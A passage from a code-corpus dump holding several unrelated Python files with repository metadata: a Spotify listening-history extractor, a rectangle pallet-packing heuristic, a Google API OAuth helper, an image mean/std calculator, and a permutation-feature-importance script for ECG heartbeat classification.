play.played_at_utc = played_at_utc
play.played_at_cet = played_at_cet
play.day = played_at_cet.day
play.month = played_at_cet.month
play.year = played_at_cet.year
play.hour = played_at_cet.hour
play.minute = played_at_cet.minute
play.second = played_at_cet.second
play.day_of_week = played_at_cet.weekday()
play.week_of_year = played_at_cet.date().isocalendar()[1]
# Track
track = self.get_track(track_id)
play.track = track
play.track_id = track_id
return play
def _get_play_tuples_from_response(self, response):
plays = []
for item in response['items']:
play_tuple = (item['played_at'], item['track']['id'])
plays.append(play_tuple)
return plays
def _get_play_tuples(self, limit=50, after=None):
play_tuples = []
response = self.client._get('me/player/recently-played', after=after, limit=limit)
play_tuples.extend(self._get_play_tuples_from_response(response))
while response and 'next' in response:
response = self.client.next(response)
if response:
play_tuples.extend(self._get_play_tuples_from_response(response))
return play_tuples
def extract_plays(self):
print("* Extracting latest plays of {}.".format(self.user_name))
play_tuples = self._get_play_tuples()
for played_at, track_id in play_tuples:
play = self.get_play_from_played_at_utc_and_track_id(played_at, track_id)
self.db.save_play(play)
class HoergewohnheitenManager(object):
def __init__(self, spotify_user_data):
self.spotify = SpotifyConnection(user_data=spotify_user_data)
def process_hoergewohnheiten(self):
self.spotify.extract_plays()
def process_hoergewohnheiten(user_name):
print("***", user_name, "***")
user_data = settings.SPOTIFY_USERS[user_name]
mgr = HoergewohnheitenManager(user_data)
mgr.process_hoergewohnheiten()
if __name__ == '__main__':
print('''
_ ___ ____ ___ __ ____ _ ___ _ _ _ ____ _ _____ ____ _
| |_| / / \ | |_ | |_) / /`_ | |_ \ \ // / \ | |_| | |\ | | |_| | |_ | | | | | |_ | |\ |
|_| | \_\_/ |_|__ |_| \ \_\_/ |_|__ \_\/\/ \_\_/ |_| | |_| \| |_| | |_|__ |_| |_| |_|__ |_| \|
''')
print("Started at {}.".format(datetime.now()))
# Argparse
parser = argparse.ArgumentParser(description='Hoergewohnheiten')
parser.add_argument('-u', dest='user_name')
args = parser.parse_args()
if args.user_name:
process_hoergewohnheiten(args.user_name)
else:
for user_name in settings.SPOTIFY_USERS:
process_hoergewohnheiten(user_name)
print("Finished at {}.".format(datetime.now()))
|
mymindwentblvnk/hoergewohnheiten
|
extract/main.py
|
main.py
|
py
| 7,345 |
python
|
en
|
code
| 16 |
github-code
|
6
|
[
{
"api_name": "dateutil.tz.gettz",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "dateutil.tz",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "dateutil.tz.gettz",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "dateutil.tz",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "dateutil.tz.gettz",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "dateutil.tz",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "spotipy.util.prompt_for_user_token",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "spotipy.util",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "spotipy.Spotify",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "models.PostgreSQLConnection",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "models.Artist",
"line_number": 50,
"usage_type": "argument"
},
{
"api_name": "models.Artist",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "models.Artist",
"line_number": 60,
"usage_type": "argument"
},
{
"api_name": "models.Album",
"line_number": 63,
"usage_type": "argument"
},
{
"api_name": "models.Album",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "models.Album",
"line_number": 76,
"usage_type": "argument"
},
{
"api_name": "models.Track",
"line_number": 79,
"usage_type": "argument"
},
{
"api_name": "models.Track",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "models.Track",
"line_number": 99,
"usage_type": "argument"
},
{
"api_name": "models.Play",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "settings.SPOTIFY_USERS",
"line_number": 166,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 178,
"usage_type": "name"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 181,
"usage_type": "call"
},
{
"api_name": "settings.SPOTIFY_USERS",
"line_number": 188,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 191,
"usage_type": "name"
}
] |
17333008494
|
import collections
class Rectangle():
def __init__(self, w, h, placed=None, free_wh=None):
self.wh = w, h
self.placed = placed or []
self.free_wh = free_wh or (0,0)
@property
def w(self):
return self.wh[0]
@property
def h(self):
return self.wh[1]
def transposed(self):
return Rectangle(self.h, self.w,
[r.transposed() for r in self.placed],
(self.free_wh[1], self.free_wh[0]),
)
@staticmethod
def placed_build(W, H, rect):
# build rectangle of size (W, H) with placed rectangle rect
if not W or not H:
return
w, h = rect.wh
if (W, H) == (w, h):
return Rectangle(W, H, [rect])
elif (W, H) == (h, w):
return Rectangle(W, H, [rect.transposed()])
H_h = H - h, W >= w
W_w = W - w, H >= h
H_w = H - w, W >= h
W_h = W - h, H >= w
cases = [H_h, W_w, H_w, W_h]
residue = [c[0] for c in cases if c[1] and c[0] >= 0]
if not residue:
return None
min_size = min(residue)
if H_h[0] == min_size and H_h[1]:
placed_r = Rectangle(w, H,
[rect],
(w, H - h))
free_wh = (W - w, H)
elif W_w[0] == min_size and W_w[1]:
placed_r = Rectangle(W, h,
[rect],
(W - w, h))
free_wh = (W, H - h)
elif H_w[0] == min_size and H_w[1]:
placed_r = Rectangle(h, H,
[rect.transposed()],
(h, H - w))
free_wh = (W - h, H)
elif W_h[0] == min_size and W_h[1]:
placed_r = Rectangle(W, w,
[rect.transposed()],
(W - h, w))
free_wh = (W, H - w)
else:
assert False, 'impossible'
out = Rectangle(W, H, [placed_r], free_wh)
return out
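    # Example (hand-checked against the cases above, values illustrative): placed_build(10, 4, Rectangle(5, 3))
    # takes the H_h branch, wraps the 5x3 rectangle in a 5x4 strip with free_wh = (5, 1) inside
    # the strip, and returns a 10x4 Rectangle whose remaining free_wh is (5, 4).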
def place(self, rect):
W, H = self.free_wh
r = Rectangle.placed_build(W, H, rect)
if not r:
return False
self.placed.append(r.placed[0])
self.free_wh = r.free_wh
#print(f'place {rect.wh}: free {W,H} -> {self.free_wh}')
return True
@staticmethod
def concat(rects, by='w'):
w = list(map(lambda r : r.w, rects))
h = list(map(lambda r : r.h, rects))
if 'w' == by:
max_w = max(w)
placed_r = [
Rectangle.placed_build(max_w, r.h, r)
for r in rects
]
out = Rectangle(max_w, sum(h), placed_r)
else:
max_h = max(h)
placed_r = [
Rectangle.placed_build(r.w, max_h, r)
for r in rects
]
out = Rectangle(sum(w), max_h, placed_r)
return out
@staticmethod
def min_concat(W, H, rect1, rect2):
rect2T = Rectangle(rect2.h, rect2.w, rect2.placed, rect2.free_wh)
concat_cases = [
Rectangle.concat([rect1, rect2], by='w'),
Rectangle.concat([rect1, rect2], by='h'),
Rectangle.concat([rect1, rect2T], by='w'),
Rectangle.concat([rect1, rect2T], by='h'),
]
if W < H:
W, H = H, W
concat_cases = [r for r in concat_cases if max(r.wh) <= W and min(r.wh) <= H]
if not concat_cases:
return
return min(concat_cases, key=lambda r : r.free_square)
@property
def square(self):
return self.w * self.h
@property
def free_square(self):
out = self.free_wh[0] * self.free_wh[1]
for r in self.placed:
out += r.free_square
return out
def free_print(self):
if self.free_wh[0] and self.free_wh[1]:
print(self.free_wh)
for r in self.placed:
r.free_print()
@property
def fullness(self):
return (1 - self.free_square / self.square) * 100
def __repr__(self):
return f'Rectangle(w={self.w}, h={self.h}, childs={len(self.placed)}, free_wh={self.free_wh}, fullness={self.fullness}%)'
def equal_side_concat_step(rects, W, H, order='descending'):
w = list(map(lambda r : r.w, rects))
h = list(map(lambda r : r.h, rects))
side_cnt = collections.Counter([s for s in w + h if s <= max(W, H)])
side_repeats = [ side
for side, cnt in side_cnt.most_common()
if cnt > 1
]
side_repeats.sort(reverse=('descending' == order))
single_rects = list(rects)
side_to_rects = {}
for side in side_repeats:
side_to_rects[side] = [r for r in single_rects
if side in r.wh]
single_rects = [r for r in single_rects
if side not in r.wh]
    # TODO: if a rectangle shares every side with other rectangles -> several options for which side to concatenate along
concat_rects = []
for side, side_rects in side_to_rects.items():
if 1 == len(side_rects):
single_rects.append(side_rects[0])
continue
for r in side_rects:
if side != r.w:
r.wh = r.h, r.w
        # TODO: 1D packing along H or W
        # below, rectangles are packed along the largest possible side
side_rects.sort(key=lambda r : r.h, reverse=True)
concat_side = max(H, W) if side <= min(H, W) else min(H, W)
while side_rects:
rects_for_concat = []
rest_rects = []
sum_h = 0
for r in side_rects:
if sum_h + r.h <= concat_side:
rects_for_concat.append(r)
sum_h += r.h
else:
rest_rects.append(r)
if len(rects_for_concat) == 1:
single_rects.append(rects_for_concat[0])
elif len(rects_for_concat) > 1:
concat_rects.append(Rectangle.concat(rects_for_concat, by='w'))
else:
single_rects.extend(rest_rects)
break
#assert False, f'side_rects={side_rects}, rest_rects={rest_rects}, max_h={max_h}'
side_rects = rest_rects
return single_rects, concat_rects
def exact_concat(rects, W, H):
merge_rects = list(rects)
while True:
single_rects, concat_rects = equal_side_concat_step(merge_rects, W, H, order='descending')
#print(f'single_rects={single_rects} \n concat_rects={concat_rects} \n')
merge_rects = single_rects + concat_rects
if not concat_rects:
break
while True:
single_rects, concat_rects = equal_side_concat_step(merge_rects, W, H, order='ascending')
merge_rects = single_rects + concat_rects
if not concat_rects:
break
return merge_rects
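# Illustrative example of the merge step above: on a pallet with one side of at least 12,
# rectangles of 3x7 and 3x5 share the side 3, get rotated so that w == 3, and are
# concatenated by 'w' into a single 3x12 strip that is then placed as one piece.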
def pallet_exact_side_placement(rects, pallet, side='max'):
W, H = pallet.free_wh
side = max(W, H) if 'max' == side else min (W, H)
rest_rects = []
for r in rects:
if side in r.wh:
if pallet.place(r):
continue
rest_rects.append(r)
return rest_rects
def exact_placement(rects, pallet):
rest_rects = list(rects)
while rest_rects:
rest_rects1 = pallet_exact_side_placement(rest_rects, pallet, side='max')
rest_rects2 = pallet_exact_side_placement(rest_rects1, pallet, side='min')
if len(rest_rects) == len(rest_rects2):
break
rest_rects = rest_rects2
return rest_rects
def rects_flatten(rects):
out = []
for r in rects:
if r.placed:
out.extend(rects_flatten(r.placed))
else:
out.append(r)
return out
def min_residue(WH, rects):
W, H = WH
min_r = None
min_residue_wh = WH
for r in rects:
placed_r = Rectangle.placed_build(W, H, r)
if placed_r:
residue_wh = placed_r.placed[0].free_wh
if residue_wh[0] * residue_wh[1] < min_residue_wh[0] * min_residue_wh[1]:
min_residue_wh = residue_wh
min_r = r
return min_r, min_residue_wh
def min_residue_placement(pallet, rects):
max_r, min_residue_wh = min_residue(pallet.free_wh, rects)
if not max_r or min_residue_wh[0] * min_residue_wh[1] > max_r.square:
return rects
rest_rects = [r for r in rects if r is not max_r]
r, _ = min_residue(min_residue_wh, rest_rects)
if not r:
pallet.place(max_r)
return rest_rects
return rects
def find_concat_pair(W, H, rects):
min_loss = 1
min_values = None
for i in range(len(rects)):
for j in range(i + 1, len(rects)):
cur_concat = Rectangle.min_concat(W, H, rects[i], rects[j])
if not cur_concat:
continue
cur_loss = cur_concat.free_square / min(rects[i].square, rects[j].square)
if cur_loss < min_loss:
min_loss = cur_loss
min_values = (i, j, cur_concat)
return min_values
def free_placement(pallet, rects):
rest_rects = list(rects)
while rest_rects:
W, H = pallet.free_wh
if not W * H:
break
concat_rects = exact_concat(rest_rects, W, H)
#print(f'concat_rects={concat_rects}')
rest_rects = exact_placement(concat_rects, pallet)
#print(f'exact_placement: rest_rects={rest_rects}, concat_rects={concat_rects}, pallet={pallet}')
if len(rest_rects) == len(concat_rects):
rest_rects2 = min_residue_placement(pallet, rest_rects)
if len(rest_rects2) == len(rest_rects):
find_values = find_concat_pair(W, H, rest_rects)
if not find_values:
#print(f'not find_concat_pair for rest_rects={rest_rects}')
break
i, j, concat_r = find_values
assert pallet.place(concat_r)
del rest_rects[j]
del rest_rects[i]
else:
rest_rects = rest_rects2
rest_rects = rects_flatten(rest_rects)
return rest_rects
def pallet_placement(pallet, rects):
rest_rects = free_placement(pallet, rects)
# placed = len(rects) - len(rest_rects)
# if placed:
# print(f'pallet: {pallet}, placed: {placed} \n')
for r in pallet.placed:
rest_rects = pallet_placement(r, rest_rects)
return rest_rects
def assign_coordinates(x, y, W, H, rects):
out_xywh = []
for r in rects:
if W == r.h or H == r.w:
r = r.transposed()
if not r.placed:
out_xywh.append((x, y, r.w, r.h))
#print(f'append {x,y,r.w,r.h}')
else:
out_xywh.extend(assign_coordinates(x, y, r.w, r.h, r.placed))
if W == r.w:
y += r.h
H -= r.h
elif H == r.h:
x += r.w
W -= r.w
else:
assert False, f'WH={W,H}, r={r}'
return out_xywh
|
yad439/pallet-packing
|
concat_baseline/concat_baseline.py
|
concat_baseline.py
|
py
| 11,602 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "collections.Counter",
"line_number": 154,
"usage_type": "call"
}
] |
19329693229
|
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from google.oauth2.credentials import Credentials
from google.auth.transport.requests import Request
import os
# All scopes together
ALL_SCOPES = [
'https://www.googleapis.com/auth/contacts.readonly',
'https://www.googleapis.com/auth/calendar.readonly',
'https://www.googleapis.com/auth/gmail.readonly'
]
CREDENTIALS_FILE = 'env/token.json'
def get_credentials(scopes):
creds = None
# Load credentials from the file if it exists
if os.path.exists(CREDENTIALS_FILE):
creds = Credentials.from_authorized_user_file(CREDENTIALS_FILE, scopes)
# Refresh or obtain new credentials
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request()) # Use `Request()` as the required argument for `refresh()`
else:
flow = InstalledAppFlow.from_client_secrets_file('env/oauth2_credentials.json', scopes)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(CREDENTIALS_FILE, 'w') as token:
token.write(creds.to_json())
return creds
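# Typical usage of the helper above (see also the __main__ block at the bottom of this file):
#   creds = get_credentials(ALL_SCOPES)
#   people_service = get_authenticated_service('people', 'v1', creds)
# The cached token in env/token.json is reused and refreshed when possible; the browser-based
# OAuth flow only runs when no valid credentials are available.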
# Build the service using credentials
def get_authenticated_service(api, version, creds):
return build(api, version, credentials=creds)
# Fetch contacts
def get_contacts(creds):
service = get_authenticated_service('people', 'v1', creds)
results = service.people().connections().list(
resourceName='people/me',
personFields='names,emailAddresses'
).execute()
print("Data type of get_contacts results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
    return results
# Fetch calendar events
def get_calendar_events(creds):
service = get_authenticated_service('calendar', 'v3', creds)
results = service.events().list(calendarId='primary').execute()
print("Data type of get_calendar_events results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
    return results
# Fetch emails
def get_emails(creds):
service = get_authenticated_service('gmail', 'v1', creds)
results = service.users().messages().list(userId='me', maxResults=10).execute()
messages = results.get('messages', [])
full_messages = [] # List to hold the full message details
for message in messages:
msg = service.users().messages().get(userId='me', id=message['id']).execute()
full_messages.append(msg)
return full_messages
if __name__ == "__main__":
creds = get_credentials(ALL_SCOPES)
get_contacts(creds)
get_calendar_events(creds)
get_emails(creds)
|
clarkdever/gcal-gcontacts-sync
|
google_api_utils.py
|
google_api_utils.py
|
py
| 2,803 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "google.oauth2.credentials.Credentials.from_authorized_user_file",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "google.oauth2.credentials.Credentials",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "google.auth.transport.requests.Request",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "google_auth_oauthlib.flow.InstalledAppFlow",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "googleapiclient.discovery.build",
"line_number": 39,
"usage_type": "call"
}
] |
19969055167
|
"""
This helps in finding the means and standard deviations of the images to normalize before training.
To run
python3 calculate_means_stds.py -i path/to/image/folder/
"""
import argparse
import subprocess
import yaml
import os
import sys
sys.path.remove("/opt/ros/kinetic/lib/python2.7/dist-packages")
import cv2
import numpy as np
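# The script makes two passes over all images: the first accumulates per-channel pixel sums
# to get mean = sum(x) / N, the second accumulates squared deviations to get
# std = sqrt(sum((x - mean)^2) / N), where N is the total number of pixels.
# Rough single-image equivalent (illustrative): img.reshape(-1, 3).mean(0) and img.reshape(-1, 3).std(0)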
def is_image(filename):
return any(filename.endswith(ext) for ext in ['.jpg', '.png'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--image', '-i',
type=str,
required=True,
default=None,
help='Directory to get the images from. If not passed, do from scratch!'
)
FLAGS, unparsed = parser.parse_known_args()
# print summary of what we will do
print("----------")
print("INTERFACE:")
#
print("image dir", FLAGS.image)
print("----------\n")
print("----------\n")
#
# create list of images and examine their pixel values
filenames = [os.path.join(dp, f) for dp, dn, fn in os.walk(
os.path.expanduser(FLAGS.image)) for f in fn if is_image(f)]
# examine individually pixel values
counter = 0.0
pix_val = np.zeros(3, dtype=np.float)
for filename in filenames:
        # analyze
print("Accumulating mean", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
cv_img = cv_img.astype(np.float) / 255.0
# count pixels and add them to counter
h, w, d = cv_img.shape
counter += h * w
# sum to moving pix value counter in each channel
pix_val += np.sum(cv_img, (0, 1))
# calculate means
means = (pix_val / counter)
# means
print("means(rgb): ", means)
# pass again and calculate variance
pix_var = np.zeros(3, dtype=np.float)
for filename in filenames:
        # analyze
print("Accumulating variance", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
cv_img = cv_img.astype(np.float) / 255.0
# sum to moving pix value counter in each channel
pix_var += np.sum(np.square(cv_img - means), (0, 1))
# calculate the standard deviations
stds = np.sqrt(pix_var / counter)
print("stds(rgb): ", stds)
# finalize by printing both
print("*" * 80)
print("means(rgb): ", means)
print("stds(rgb): ", stds)
print("*" * 80)
|
vijaysamula/Building_floor_counter
|
calculate_means_stds.py
|
calculate_means_stds.py
|
py
| 2,438 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.path.remove",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "numpy.float",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "cv2.imread",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "cv2.IMREAD_COLOR",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "cv2.cvtColor",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "numpy.float",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "numpy.sum",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "numpy.float",
"line_number": 79,
"usage_type": "attribute"
},
{
"api_name": "cv2.imread",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "cv2.IMREAD_COLOR",
"line_number": 85,
"usage_type": "attribute"
},
{
"api_name": "cv2.cvtColor",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 86,
"usage_type": "attribute"
},
{
"api_name": "numpy.float",
"line_number": 89,
"usage_type": "attribute"
},
{
"api_name": "numpy.sum",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "numpy.square",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 95,
"usage_type": "call"
}
] |
43367818416
|
# Permutation Feature Importance (PFI) for heartbeat classification using a multilayer perceptron (MLP)
#
#
# - Code: 'PFI.py'
# - Master's thesis (Trabajo Fin de Máster).
# - Néstor Bolaños Bolaños. ([email protected])
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import pickle
import glob
import matplotlib.pyplot as plt
import pandas as pd
from scipy import *
import os
import seaborn as sns
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn import *
from sklearn.metrics import *
from sklearn.model_selection import StratifiedKFold
sns.set()
# Load the data and one-hot encode the class of each heartbeat
# Load the training and test data:
tamaño = 277
valores_train = np.empty(shape=[0, tamaño])
valores_test = np.empty(shape=[0, tamaño])
latidos_entrenamiento = glob.glob('train_beats.csv')
latidos_test = glob.glob('test_beats.csv')
for j in latidos_entrenamiento:
filas = np.loadtxt(j, delimiter=',')
valores_train = np.append(valores_train, filas, axis=0)
for j in latidos_test:
filas = np.loadtxt(j, delimiter=',')
valores_test = np.append(valores_test, filas, axis=0)
print(valores_train.shape)
print(valores_test.shape)
# Split into training and test data, and apply one-hot encoding to Y:
X_train = valores_train[:,:-2]
X_test = valores_test[:,:-2]
y_train = valores_train[:,-2]
y_test = valores_test[:,-2]
# Combine everything again:
X = np.concatenate((X_train, X_test), axis = 0)
Y = np.concatenate((y_train, y_test), axis = 0)
# One-hot encoding of Y:
Y = to_categorical(Y)
# Build the multilayer perceptron
# Build the MLP model
def getModel():
model_mlp = Sequential()
model_mlp.add(Dense(100, activation = 'relu'))
model_mlp.add(Dense(9, activation = 'softmax'))
return model_mlp
# Instantiate and build the model once so that summary() can be displayed
model_mlp = getModel()
model_mlp.build(input_shape=(None, X.shape[1]))
model_mlp.summary()
# Implement and apply PFI for the multilayer perceptron
# Perturbation methods:
# There are different types of perturbation for permutation feature importance, such as mean perturbation, zero perturbation and random perturbation. In the implementation used in this notebook, the data within each slice are shuffled randomly.
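# A minimal sketch of the three alternative perturbations on a single slice (illustrative only,
# variable names are made up; the PFI loop further below uses random shuffling of the slice):
#   x_slice = X_test[:, corte:corte + 25]
#   zero_perturbed   = np.zeros_like(x_slice)
#   mean_perturbed   = np.full_like(x_slice, x_slice.mean())
#   random_perturbed = x_slice.std() * np.random.randn(*x_slice.shape) + x_slice.mean()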
fig, ax = plt.subplots(1, 4, figsize = (20, 4), sharex = True, sharey=True)
# No perturbation: original signal.
ax[0].set_title('Sin perturbación')
ax[0].plot(np.arange(len( X[20, :])), X[20, :])
# Zero perturbation: the values of each slice are set to 0.
ax[1].set_title('Perturbación 0')
X_zero_perturbed = X[20, :].copy()
X_zero_perturbed[5 * 25 : 6 * 25] = 0.0
ax[1].plot(np.arange(len(X[20, :])), X_zero_perturbed)
# Random perturbation: the values of each slice are replaced with random values.
ax[2].set_title('Perturbación aleatoria')
X_random_perturbed = X[20, :].copy()
X_random_perturbed[5 * 25 : 6 * 25] = np.std(X[20, :]) * np.random.randn(25) + np.mean(X[20, :])
ax[2].plot(np.arange(len(X[20, :])), X_random_perturbed)
# Mean perturbation: the values of the current slice are averaged.
ax[3].set_title('Perturbación Media')
X_mean_perturbed = X[20, :].copy()
X_mean_perturbed[5 * 25 : 6 * 25] = np.mean(X[20, 5 * 25 : 6 * 25])
ax[3].plot(np.arange(len(X[20, :])), X_mean_perturbed)
for i in range(4):
ax[i].set_xlabel('Tiempo')
ax[i].axvspan(5 * 25, 6 * 25, color = 'green', alpha = 0.25)
# Permutation feature importance:
kf = StratifiedKFold(n_splits = 5, shuffle = True)
contador_pliegues = 0
M = np.zeros((X.shape[0], 11))
for indice_train, indice_test in kf.split(X, np.argmax(Y, axis = 1)):
print('Fold ', contador_pliegues)
    # Split the data in each fold:
X_train, X_test = X[indice_train], X[indice_test]
y_train, y_test = Y[indice_train], Y[indice_test]
    # Build the learning model with the training data:
model_mlp = getModel()
model_mlp.compile(optimizer = 'adam', loss = tf.keras.losses.CategoricalCrossentropy())
model_mlp.fit(X_train, y_train, epochs = 100, verbose = 0)
    # Make predictions on the test data without permutations:
predicciones = model_mlp.predict(X_test)
    # For each feature:
for corte in range(0, 275, 25):
        # Permute and make predictions:
x_permutacion = np.copy(X_test)
x_corte = X_test[:, corte:corte+25]
x_corte_permutacion = np.random.permutation(x_corte)
x_permutacion[:, corte:corte + 25] = x_corte_permutacion
pred_perm = model_mlp.predict(x_permutacion)
        # Compute the importance:
importancia = ((np.argmax(y_test, axis = 1) - np.argmax(pred_perm, axis = 1))**2
- (np.argmax(y_test, axis = 1) - np.argmax(predicciones, axis = 1))**2)
M[indice_test, corte // 25] = importancia
contador_pliegues += 1
importancia_media = np.mean(M, axis = 0)
indices_ordenados = np.argsort(-1 * importancia_media)
cortes = np.arange(1, 12)
colores = ['forestgreen', 'limegreen', 'royalblue', 'blue', 'darkorange', 'cyan', 'purple', 'red', 'pink', 'yellow', 'coral']
fig, ax = plt.subplots(1, 2, figsize = (15, 4))
ax[0].bar(range(11), importancia_media[indices_ordenados], color = np.array(colores)[indices_ordenados])
ax[0].set_title('Importancia de cada característica del modelo MLP')
ax[0].set_xticks(np.arange(11))
ax[0].set_xticklabels(cortes[indices_ordenados].astype(int))
ax[0].set_xlabel('Corte')
ax[0].set_ylabel('Importancia de cada característica')
ecg_normalizado = (X[20, :] - X[20, :].min()) / (X[20, :].max() - X[20, :].min())
Importancia_caraceristica_normalizada = (importancia_media - importancia_media.min()) / (importancia_media.max() - importancia_media.min())
ax[1].plot(np.arange(len(ecg_normalizado)), ecg_normalizado, label='Datos ECG')
ax[1].plot(np.repeat(Importancia_caraceristica_normalizada, 25), label = 'Importancia de cada característica')
ax[1].set_title('Importancia de cada característica \npara el modelo MLP en una muestra de ECG')
ax[1].set_xlabel('Tiempo')
ax[1].set_ylabel('Señal ECG / Importancia de cada característica')
ax[1].legend()
|
Nestructor/Codigo_TFM_Aplicacion-del-Aprendizaje-Profundo-en-la-toma-de-Decisiones-Clinicas-Informadas
|
PFI.py
|
PFI.py
|
py
| 6,333 |
python
|
es
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "warnings.filterwarnings",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "seaborn.set",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "glob.glob",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "glob.glob",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.append",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.append",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.utils.to_categorical",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.models.Sequential",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 80,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "numpy.random.randn",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 95,
"usage_type": "attribute"
},
{
"api_name": "numpy.mean",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "sklearn.model_selection.StratifiedKFold",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.losses.CategoricalCrossentropy",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 121,
"usage_type": "attribute"
},
{
"api_name": "numpy.copy",
